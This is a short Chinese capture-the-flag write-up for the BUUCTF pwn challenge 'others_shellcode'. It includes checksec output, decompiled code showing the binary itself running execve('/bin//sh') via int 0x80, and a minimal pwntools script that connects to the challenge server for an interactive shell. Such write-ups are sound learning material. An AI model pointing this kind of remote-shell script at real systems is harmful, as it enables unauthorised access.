解题思路:
泄露或修改内存数据:
- 堆地址:无需
- 栈地址:无需
- libc地址:无需
- BSS段地址:无需
劫持程序执行流程:
获得shell或flag:[[利用int 0x80 OR syscall(系统调用号)]]
学到的知识:
题目信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ file others_shellcode
others_shellcode: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=c1e8d8e26946c6b08794abdad991e3909e1bdc7f, not stripped
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=others_shellcode
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled PIE enabled No RPATH No RUNPATH 72) Symbols No 0 0others_shellcode
libc版本:
wp借鉴:(24条消息) [BUUCTF-pwn]——others_shellcode_Y-peak的博客-CSDN博客
核心伪代码分析:
存在利用的的代码:
int getShell()
{
int result; // eax
char v1[9]; // [esp-Ch] [ebp-Ch] BYREF
strcpy(v1, "/bin//sh");
result = 11;
__asm { int 80h; LINUX - sys_execve }
return result;
}
int __cdecl main(int argc, const char **argv, const char **envp)
{
getShell();
return 0;
}
分析:
系统调用号,nc即可获得shell
脚本:
from pwn import *
context(log_level='debug',arch='i386',os='linux')
pwnfile='./others_shellcode'
sh=remote('node4.buuoj.cn',29881)
#sh=process(pwnfile)
sh.interactive()